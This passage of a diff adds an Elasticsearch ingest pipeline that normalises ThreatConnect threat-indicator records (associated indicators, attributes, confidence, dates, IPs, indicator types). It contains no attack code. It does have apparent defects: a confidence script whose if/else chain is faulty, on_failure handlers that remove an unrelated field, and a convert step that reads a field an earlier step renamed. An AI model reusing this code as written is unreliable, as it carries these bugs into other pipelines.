+ tag: convert_associatedIndicators_data_size_to_string
+ target_field:
_ingest._value.size
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.size
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_active_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.active
+ tag: convert_associatedIndicators_data_active_to_boolean
+ target_field: _ingest._value._temp.value
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.active
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_activeLocked_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.activeLocked
+ tag: convert_associatedIndicators_data_activeLocked_to_boolean
+ target_field: _ingest._value._temp.locked
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.activeLocked
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if:
ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_rename_associatedIndicators_data_block
+ processor:
+ rename:
+ field: _ingest._value.Block
+ tag: rename_associatedIndicators_data_block
+ target_field: _ingest._value.block
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_block
+ processor:
+ convert:
+ field: _ingest._value.Block
+ type: ip
+ tag: convert_associatedIndicators_data_block
+ target_field: related.ip
+ ignore_failure: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_confidence_to_long
+ processor:
+ convert:
+ field: _ingest._value.confidence
+ tag: convert_associatedIndicators_data_confidence_to_long
+ type: long
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.confidence
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_date_associatedIndicators_data_dateAdded
+ processor:
+ date:
+ field: _ingest._value.dateAdded
+ tag: date_associatedIndicators_data_dateAdded
+ target_field: _ingest._value.date_added
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.dateAdded
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag:
foreach_convert_associatedIndicators_data_dnsActive_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.dnsActive
+ tag: convert_associatedIndicators_data_dnsActive_to_boolean
+ target_field: _ingest._value.dns_active
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.dnsActive
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_date_associatedIndicators_data_externalDateAdded
+ processor:
+ date:
+ field: _ingest._value.externalDateAdded
+ tag: date_associatedIndicators_data_externalDateAdded
+ target_field: _ingest._value.external.date.added
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.externalDateAdded
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_date_associatedIndicators_data_externalDateExpires
+ processor:
+ date:
+ field: _ingest._value.externalDateExpires
+ tag: date_associatedIndicators_data_externalDateExpires
+ target_field: _ingest._value.external.date.expires
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.externalDateExpires
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_date_associatedIndicators_data_externalLastModified
+ processor:
+ date:
+ field: _ingest._value.externalLastModified
+ tag: date_associatedIndicators_data_externalLastModified
+ target_field: _ingest._value.external.last_modified
+ formats:
+ -
ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.externalLastModified
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_date_associatedIndicators_data_firstSeen
+ processor:
+ date:
+ field: _ingest._value.firstSeen
+ tag: date_associatedIndicators_data_firstSeen
+ target_field: _ingest._value.first_seen
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.firstSeen
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_id_to_string
+ processor:
+ convert:
+ field: _ingest._value.id
+ tag: convert_associatedIndicators_data_id_to_string
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.id
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_ip_to_ip
+ processor:
+ convert:
+ field: _ingest._value.ip
+ tag: convert_associatedIndicators_data_ip_to_ip
+ type: ip
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.ip
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if:
ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_append_associatedIndicators_data_ip_into_related_ip
+ processor:
+ append:
+ field: related.ip
+ tag: append_associatedIndicators_data_ip_into_related_ip
+ value: '{{{_ingest._value.value.ip}}}'
+ allow_duplicates: false
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_date_associatedIndicators_data_lastModified
+ processor:
+ date:
+ field: _ingest._value.lastModified
+ tag: date_associatedIndicators_data_lastModified
+ target_field: _ingest._value.last_modified
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.lastModified
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_date_associatedIndicators_data_lastSeen
+ processor:
+ date:
+ field: _ingest._value.lastSeen
+ tag: date_associatedIndicators_data_lastSeen
+ target_field: _ingest._value.last_seen
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.lastSeen
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_ownerId_to_string
+ processor:
+ convert:
+ field: _ingest._value.ownerId
+ tag: convert_associatedIndicators_data_ownerId_to_string
+ target_field: _ingest._value.owner.id
+ type: string
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_rename_associatedIndicators_data_ownerName
+ processor:
+ rename:
+ field: _ingest._value.ownerName
+ tag: rename_associatedIndicators_data_ownerName
+ target_field: _ingest._value.owner.name
+ ignore_missing:
true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_privateFlag_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.privateFlag
+ tag: convert_associatedIndicators_data_privateFlag_to_boolean
+ target_field: _ingest._value.private_flag
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.privateFlag
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_rating_to_double
+ processor:
+ convert:
+ field: _ingest._value.rating
+ tag: convert_associatedIndicators_data_rating_to_double
+ type: double
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.rating
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_rename_associatedIndicators_data_Value_Name
+ processor:
+ rename:
+ field: _ingest._value.Value Name
+ tag: rename_associatedIndicators_data_Value_Name
+ target_field: _ingest._value.value.name
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag:
foreach_rename_associatedIndicators_data_Value_Type
+ processor:
+ rename:
+ field: _ingest._value.Value Type
+ tag: rename_associatedIndicators_data_Value_Type
+ target_field: _ingest._value.value.type
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_convert_associatedIndicators_data_whoisActive_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.whoisActive
+ tag: convert_associatedIndicators_data_whoisActive_to_boolean
+ target_field: _ingest._value.whois_active
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.whoisActive
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_associated_indicators_remove_duplicate_fields
+ processor:
+ remove:
+ field:
+ - _ingest._value.active
+ - _ingest._value.activeLocked
+ - _ingest._value.Block
+ - _ingest._value.dnsActive
+ - _ingest._value.dateAdded
+ - _ingest._value.externalDateAdded
+ - _ingest._value.externalDateExpires
+ - _ingest._value.externalLastModified
+ - _ingest._value.firstSeen
+ - _ingest._value.lastSeen
+ - _ingest._value.lastModified
+ - _ingest._value.ownerId
+ - _ingest._value.privateFlag
+ - _ingest._value.Value Type
+ - _ingest._value.Value Name
+ - _ingest._value.whoisActive
+ tag: remove_duplicate_fields
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.associated_indicators.data
+ if: ctx.threat_connect?.indicator?.associated_indicators?.data != null
+ tag: foreach_rename_temp_to_active
+ processor:
+ rename:
+ field:
_ingest._value._temp
+ tag: rename_temp_to_active
+ target_field: _ingest._value.active
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_rename_attributes_data_createdBy_firstName
+ processor:
+ rename:
+ field: _ingest._value.createdBy.firstName
+ tag: rename_attributes_data_createdBy_firstName
+ target_field: _ingest._value.created_by.first_name
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_append_attributes_data_createdBy_firstName_into_related_user
+ processor:
+ append:
+ field: related.user
+ tag: append_attributes_data_createdBy_firstName_into_related_user
+ value: '{{{_ingest._value.created_by.first_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_convert_attributes_data_createdBy_id_to_string
+ processor:
+ convert:
+ field: _ingest._value.createdBy.id
+ tag: convert_attributes_data_createdBy_id_to_string
+ target_field: _ingest._value.created_by.id
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.default
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_rename_attributes_data_createdBy_lastName
+ processor:
+ rename:
+ field: _ingest._value.createdBy.lastName
+ tag: rename_attributes_data_createdBy_lastName
+ target_field: _ingest._value.created_by.last_name
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_append_attributes_data_createdBy_lastName_into_related_user
+ processor:
+ append:
+ field:
related.user
+ tag: append_attributes_data_createdBy_lastName_into_related_user
+ value: '{{{_ingest._value.created_by.last_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_rename_attributes_data_createdBy_owner
+ processor:
+ rename:
+ field: _ingest._value.createdBy.owner
+ tag: rename_attributes_data_createdBy_owner
+ target_field: _ingest._value.created_by.owner
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_rename_attributes_data_createdBy_pseudonym
+ processor:
+ rename:
+ field: _ingest._value.createdBy.pseudonym
+ tag: rename_attributes_data_createdBy_pseudonym
+ target_field: _ingest._value.created_by.pseudonym
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_rename_attributes_data_createdBy_userName
+ processor:
+ rename:
+ field: _ingest._value.createdBy.userName
+ tag: rename_attributes_data_createdBy_userName
+ target_field: _ingest._value.created_by.user_name
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_append_attributes_data_createdBy_userName_into_related_user
+ processor:
+ append:
+ field: related.user
+ tag: append_attributes_data_createdBy_userName_into_related_user
+ value: '{{{_ingest._value.created_by.user_name}}}'
+ allow_duplicates: false
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_date_attributes_data_dateAdded
+ processor:
+ date:
+ field: _ingest._value.dateAdded
+ tag: date_attributes_data_dateAdded
+ target_field: _ingest._value.date_added
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.dateAdded
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag:
foreach_convert_attributes_data_default_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.default
+ tag: convert_attributes_data_default_to_boolean
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.default
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_date_attributes_data_lastModified
+ processor:
+ date:
+ field: _ingest._value.lastModified
+ tag: date_attributes_data_lastModified
+ target_field: _ingest._value.last_modified
+ formats:
+ - ISO8601
+ on_failure:
+ - remove:
+ field: _ingest._value.lastModified
+ ignore_missing: true
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_convert_attributes_data_pinned_to_boolean
+ processor:
+ convert:
+ field: _ingest._value.pinned
+ tag: convert_attributes_data_pinned_to_boolean
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.pinned
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - foreach:
+ field: json.attributes.data
+ if: ctx.json?.attributes?.data != null
+ tag: foreach_convert_attributess_data_id_to_string
+ processor:
+ convert:
+ field: _ingest._value.id
+ tag: convert_attributess_data_id_to_string
+ target_field: _ingest._value.id
+ type: string
+ ignore_missing: true
+ on_failure:
+ - remove:
+ field: _ingest._value.default
+ ignore_missing: true
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}}
with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.attributes.data
+ tag: rename_attributes_data
+ target_field: threat_connect.indicator.attributes.data
+ ignore_missing: true
+ - foreach:
+ field: threat_connect.indicator.attributes.data
+ if: ctx.threat_connect?.indicator?.attributes?.data != null
+ tag: foreach_remove_attributes_duplicate_fields
+ processor:
+ remove:
+ field:
+ - _ingest._value.createdBy.firstName
+ - _ingest._value.createdBy.lastName
+ - _ingest._value.createdBy.id
+ - _ingest._value.lastModified
+ - _ingest._value.dateAdded
+ - _ingest._value.userName
+ tag: remove_attributes_duplicate_fields
+ ignore_missing: true
+ - rename:
+ field: json.Block
+ tag: rename_Block
+ target_field: threat_connect.indicator.block
+ ignore_missing: true
+ - convert:
+ field: json.confidence
+ tag: convert_confidence_to_long
+ target_field: threat_connect.indicator.confidence
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - script:
+ lang: painless
+ if: ctx.json?.confidence != null
+ description: Normalize confidence level.
+ source: >
+ def value = ctx.json?.confidence;
+ def confidence = "None";
+ if (value == 0) {
+ confidence = "Not Specified";
+ } if (value > 1 && value < 40) {
+ confidence = "Low";
+ } if (value >= 40.0 && value < 70) {
+ confidence = "Medium";
+ } else if (value >= 70 && value <= 100) {
+ confidence = "High";
+ }
+ ctx.threat.indicator.put("confidence", confidence)
+ - rename:
+ field: json.customAssociations
+ tag: rename_customAssociations
+ target_field: threat_connect.indicator.custom_associations
+ ignore_missing: true
+ - convert:
+ field: json.dnsActive
+ tag: convert_dnsActive_to_boolean
+ target_field: threat_connect.indicator.dns_active
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.description
+ tag: rename_description
+ target_field: threat_connect.indicator.description
+ ignore_missing: true
+ - set:
+ field: threat.indicator.description
+ tag: set_threat_indicator_description_from_indicator_description
+ copy_from: threat_connect.indicator.description
+ ignore_empty_value: true
+ - rename:
+ field: json.dnsResolution
+ tag: rename_dnsResolution
+ target_field: threat_connect.indicator.dns_resolution
+ ignore_missing: true
+ - rename:
+ field: json.enrichment
+ tag: rename_enrichment
+ target_field: threat_connect.indicator.enrichment
+ ignore_missing: true
+ - date:
+ field: json.externalDateAdded
+ tag: date_externalDateAdded
+ target_field: threat_connect.indicator.external.date.added
+ formats:
+ - ISO8601
+ if: ctx.json?.externalDateAdded != null && ctx.json.externalDateAdded != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline
{{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.externalDateExpires
+ tag: date_externalDateExpires
+ target_field: threat_connect.indicator.external.date.expires
+ formats:
+ - ISO8601
+ if: ctx.json?.externalDateExpires != null && ctx.json.externalDateExpires != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.externalLastModified
+ tag: date_externalLastModified
+ target_field: threat_connect.indicator.external_last.modified
+ formats:
+ - ISO8601
+ if: ctx.json?.externalLastModified != null && ctx.json.externalLastModified != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: threat.indicator.modified_at
+ tag: set_threat_indicator_modified_at_from_indicator_external_last_modified
+ copy_from: threat_connect.indicator.external_last.modified
+ ignore_empty_value: true
+ - convert:
+ field: json.falsePositiveReportedByUser
+ tag: convert_falsePositiveReportedByUser_to_boolean
+ target_field: threat_connect.indicator.false_positive_reported_by_user
+ type: boolean
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: json.falsePositives
+ tag: convert_falsePositives_to_long
+ target_field: threat_connect.indicator.false_positives
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field:
error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.fileActions + tag: rename_fileActions + target_field: threat_connect.indicator.file_actions + ignore_missing: true + - rename: + field: json.fileOccurrences + tag: rename_fileOccurrences + target_field: threat_connect.indicator.file_occurrences + ignore_missing: true + - date: + field: json.firstSeen + tag: date_firstSeen + target_field: threat_connect.indicator.first_seen + formats: + - ISO8601 + if: ctx.json?.firstSeen != null && ctx.json.firstSeen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: threat.indicator.first_seen + tag: set_threat_indicator_first_seen_from_indicator_first_seen + copy_from: threat_connect.indicator.first_seen + ignore_empty_value: true + - rename: + field: json.genericCustomIndicatorValues + tag: rename_genericCustomIndicatorValues + target_field: threat_connect.indicator.generic_custom_indicator_values + ignore_missing: true + - rename: + field: json.geoLocation + tag: rename_geoLocation + target_field: threat_connect.indicator.geo_location + ignore_missing: true + - rename: + field: json.Hashtag + tag: rename_Hashtag + target_field: threat_connect.indicator.hashtag + ignore_missing: true + - rename: + field: json.hostName + tag: rename_hostName + target_field: threat_connect.indicator.host_name + ignore_missing: true + - set: + field: observer.hostname + tag: set_observer_hostname_from_indicator_host_name + copy_from: threat_connect.indicator.host_name + ignore_empty_value: true + - append: + field: related.hosts + tag: convert_hostname_address_to_related_host + 
value: '{{{threat_connect.indicator.host_name}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.host_name != null + - convert: + field: json.id + tag: convert_id_to_string + target_field: threat_connect.indicator.id + type: string + ignore_missing: true + - rename: + field: json.investigationLinks + tag: rename_investigationLinks + target_field: threat_connect.indicator.investigation_links + ignore_missing: true + - convert: + field: json.ip + tag: convert_ip_to_ip + target_field: threat_connect.indicator.ip + type: ip + ignore_missing: true + if: ctx.json?.ip != null && ctx.json.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - append: + field: related.ip + tag: convert_ip_to_related_ip + value: '{{{threat_connect.indicator.ip}}}' + allow_duplicates: false + if: ctx.threat_connect?.indicator?.ip != null + - date: + field: json.lastFalsePositive + tag: date_lastFalsePositive + target_field: threat_connect.indicator.last_false_positive + formats: + - ISO8601 + if: ctx.json?.lastFalsePositive != null && ctx.json.lastFalsePositive != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: json.lastModified + tag: date_lastModified + target_field: threat_connect.indicator.last_modified + formats: + - ISO8601 + if: ctx.json?.lastModified != null && ctx.json.lastModified != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' + - set: + field: '@timestamp' + tag: set_@timestamp_from_indicator_last_modified + copy_from: threat_connect.indicator.last_modified + ignore_empty_value: true + - date: + field: json.lastSeen + tag: date_lastSeen + target_field: threat_connect.indicator.last_seen + formats: + - ISO8601 + if: ctx.json?.lastSeen != null && ctx.json.lastSeen != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: threat.indicator.last_seen + tag: set_threat_indicator_last_seen_from_indicator_last_seen + copy_from: threat_connect.indicator.last_seen + ignore_empty_value: true + - date: + field: json.dateAdded + tag: date_dateAdded + target_field: threat_connect.indicator.date_added + formats: + - ISO8601 + if: ctx.json?.dateAdded != null && ctx.json.dateAdded != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - rename: + field: json.type + tag: rename_type + target_field: threat_connect.indicator.type + ignore_missing: true + - script: + description: Add value for event category based on action. 
+ tag: script_to_add_category + if: ctx.threat_connect?.indicator?.type instanceof String && ctx.threat_connect.indicator.type != '' + lang: painless + source: >- + if (ctx.threat_connect.indicator.type.contains('File')) { + ctx.threat.indicator.type = ['file']; + } else if (ctx.threat_connect.indicator.type.contains('URL')){ + ctx.threat.indicator.type = ['url']; + } else if (ctx.threat_connect.indicator.type.contains('EmailAddress')){ + ctx.threat.indicator.type = ['email-addr']; + } else if (ctx.threat_connect.indicator.type.contains('Mutex')){ + ctx.threat.indicator.type = ['mutex']; + } else if (ctx.threat_connect.indicator.type.contains('Registry Key')){ + ctx.threat.indicator.type = ['windows-registry-key']; + } + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: threat.indicator.ip + tag: set_threat_indicator_ip_from_indicator_ip + copy_from: threat_connect.indicator.ip + ignore_empty_value: true + if: ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.type == 'Address' + - set: + field: threat.indicator.type + tag: set_threat_indicator_type_to_ipv6_addr + value: ipv6-addr + if: ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.type == 'Address' && ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.ip.contains(":") + - set: + field: threat.indicator.type + tag: set_threat_indicator_type_to_ipv4_addr + value: ipv4-addr + if: ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.type == 'Address' && ctx.threat_connect?.indicator?.type != null && ctx.threat_connect.indicator.ip.contains(".") + - rename: + field: json.legacyLink + tag: rename_legacyLink + target_field: threat_connect.indicator.legacy_link + ignore_missing: true + - append: + field: 
